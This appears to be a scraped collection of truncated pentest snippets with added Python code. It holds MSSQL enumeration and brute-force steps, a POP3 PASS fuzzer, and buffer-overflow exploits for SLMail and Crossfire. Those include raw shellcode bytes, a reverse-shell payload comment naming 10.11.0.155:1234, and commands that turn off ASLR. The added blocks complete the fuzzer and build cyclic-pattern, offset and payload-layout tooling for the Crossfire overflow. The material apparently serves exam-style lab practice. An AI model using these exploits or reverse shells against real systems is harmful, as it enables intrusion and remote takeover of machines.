[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanne...
Score: 0
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available crea...
Score: 0
#!/usr/bin/python
import socket
# create an array of buffers, while incrementing them
buffer=["A"]
counter=100
while len(buffer) <=30:
    buffer.append("A"*counter)
    counter=counter+200
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_S...
Score: 0
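The snippet above is cut off before the connect/send part. Here is an added example (not the original script) that completes the same idea as a Python 3 fuzzer: it builds the identical list of growing buffers, logs in with USER first, sends each one as the PASS argument, and stops at the first size where the service no longer answers. The POP3 port 110 and the user name "test" are assumptions for the example.

```python
#!/usr/bin/env python3
"""Incremental fuzzer for a POP3 PASS command (added example, not the original script)."""
import socket


def build_buffers(start=100, step=200, count=30):
    """Same list as the snippet: 'A', then start, start+step, ... for `count` more entries."""
    buffers = ["A"]
    size = start
    while len(buffers) <= count:
        buffers.append("A" * size)
        size += step
    return buffers


def fuzz_pass(host, port=110, user="test", timeout=5.0):
    """Send each buffer as PASS; return the first length that got no answer, or None if all survived."""
    for payload in build_buffers():
        print("Fuzzing PASS with %d bytes" % len(payload))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            s.recv(1024)                                     # banner
            s.sendall(("USER %s\r\n" % user).encode())
            s.recv(1024)
            s.sendall(("PASS %s\r\n" % payload).encode())
            s.recv(1024)                                     # no reply / reset => crashed
        except OSError:
            # timeout, connection refused or reset: the service most likely died at this size
            return len(payload)
        finally:
            s.close()
    return None


if __name__ == "__main__":
    import sys
    crashed_at = fuzz_pass(sys.argv[1])
    print("crashed at %s bytes" % crashed_at if crashed_at else "no crash up to the largest buffer")
```

The length reported is the first buffer that killed the service, so the real crash threshold lies between that value and the previous one; that range is what you narrow down with a cyclic pattern next.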
#!/usr/bin/env ruby
=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shikata_ga_nai
=end
require 'socket'
#bad chars = "\x00\x0a\x0d"
#jmp esp addre...
Score: 0
prefix = "\x41" * 80
eip = "\x42" * 4
nop = "\x90" * (400 - 137)
buf = ""
buf += "\xba\x8a\x2a\xb0\xa4\xd9\xed\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1c\x31\x55\x14\x03\x55\x14\x83\xed\xfc\x68"
buf += "\xdf\xda\xd9\x34\xb9\xa9\x25\x7d\x...
Score: 0
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = "\x41" * 4379
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
...
Score: 0
#!/usr/bin/env ruby
=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end
require 'socket'
#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"
#add eax, 12 = 83C00C
#jmp eax = FFE0
#create shellcode
#creates a bi...
Score: 0
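The crash PoC and the exploit comments above give the numbers that matter: 4379 bytes reach the overflowing buffer, EIP sits at offset 4368, the bad characters are \x00\x0a\x0d\x20, and the first stage is `add eax,12 ; jmp eax` (the 12 skips the literal "setup sound " so eax lands on the start of the payload). The following is an added example, not the original Ruby exploit: a Metasploit-style cyclic pattern generator and offset finder (how a value like 4368 is found from the crashed EIP), plus a layout builder that enforces those numbers. The EIP value is a parameter because the page does not show the gadget address; the shellcode bytes passed in the test are a constructed placeholder.

```python
#!/usr/bin/env python3
"""Cyclic pattern, offset lookup and buffer layout for the Crossfire 'setup sound' overflow."""
import string
import struct

TOTAL = 4379            # bytes that reach the overflowing buffer (from the page)
EIP_OFFSET = 4368       # where the saved return address lives (from the page)
STAGE1 = b"\x83\xc0\x0c" + b"\xff\xe0"   # add eax,12 ; jmp eax  (5 of the 7 bytes after EIP)
BADCHARS = b"\x00\x0a\x0d\x20"


def cyclic_pattern(length):
    """Aa0Aa1...Zz9 pattern: every 3-byte triple is unique, so a 4-byte window has one offset."""
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(value, length=20280):
    """Offset of a crashed EIP (int, read from the debugger) or a 4-byte string in the pattern."""
    if isinstance(value, int):
        needle = struct.pack("<I", value)      # EIP is shown big-endian, stored little-endian
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return cyclic_pattern(length).find(needle)


def build_crash_payload(eip, shellcode, nop_sled=16):
    """[nops][shellcode][pad] up to EIP_OFFSET, then EIP, then stage1 and pad to TOTAL bytes."""
    if any(b in BADCHARS for b in shellcode):
        raise ValueError("shellcode contains a bad character; re-encode it")
    head = b"\x90" * nop_sled + shellcode
    if len(head) > EIP_OFFSET:
        raise ValueError("shellcode does not fit in the %d bytes before EIP" % EIP_OFFSET)
    head += b"\x90" * (EIP_OFFSET - len(head))
    tail = STAGE1 + b"\x90" * (TOTAL - EIP_OFFSET - 4 - len(STAGE1))
    payload = head + struct.pack("<I", eip) + tail
    assert len(payload) == TOTAL
    return payload


def wrap_setup_sound(payload):
    """Same framing as the crash PoC: command byte, '(', the command, then the terminator."""
    return b"\x11(setup sound " + payload + b"\x90\x00#"
```

Typical use: send `wrap_setup_sound(cyclic_pattern(TOTAL))`, read EIP from the debugger and call `pattern_offset(0x....)`; once the offset matches 4368, swap in the real gadget address and the encoded shellcode.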
cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c...
Score: 0
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...
Score: 0
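The string above is the full \x00..\xff probe you send in place of shellcode and then compare against memory in the debugger; a byte that gets dropped, mangled or truncates the string is a bad character, and you remove it and repeat. As an added example (not code from the original notes), the following generates the probe minus the bytes already known to be bad and diffs it against what was observed in memory, reporting the first byte that did not survive. The observed dumps in the test are constructed, not taken from a real target.

```python
#!/usr/bin/env python3
"""Bad-character probe generation and comparison (added example)."""


def badchars_probe(exclude=(0x00,)):
    """Every byte value 0x00..0xff, in order, minus those already known to be bad."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def find_mangled(sent, observed):
    """Compare the probe with the bytes dumped from memory.

    Returns a list of (offset, sent_byte, observed_byte); observed_byte is None when the
    copy stopped short (the byte before the gap acted as a terminator).
    """
    diffs = []
    for i, b in enumerate(sent):
        if i >= len(observed):
            diffs.append((i, b, None))
            break
        if observed[i] != b:
            diffs.append((i, b, observed[i]))
    return diffs


def first_bad_char(sent, observed):
    """The next byte to add to the exclusion list, or None if the whole probe survived."""
    diffs = find_mangled(sent, observed)
    return diffs[0][1] if diffs else None


def as_escaped(data):
    """Render bytes the way the page writes them, e.g. '\\x00\\x0a\\x0d'."""
    return "".join("\\x%02x" % b for b in data)


if __name__ == "__main__":
    # Constructed walkthrough: first round the server cut the string at the newline,
    # second round a carriage return was replaced with a NUL somewhere in the copy.
    bad = [0x00]
    probe = badchars_probe(bad)
    print("round 1, first bad byte: " + as_escaped([first_bad_char(probe, probe[:9])]))
    bad.append(0x0a)
    probe = badchars_probe(bad)
    print("round 2, first bad byte: " + as_escaped([first_bad_char(probe, probe.replace(b"\x0d", b"\x00"))]))
```

Only ever trust the first difference in a round: everything after a truncating byte is missing for that reason alone, so exclude one byte, resend, and diff again until `find_mangled` returns an empty list.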
There are many distributions of Linux, and they all do things a little differently regarding default security and built-in tool sets. This means that when engaging these different flavors during a pentest, what works against one Linux target to get an interactive shell may not work against another. Well, not to worry my friends, there are many technique...
Score: 0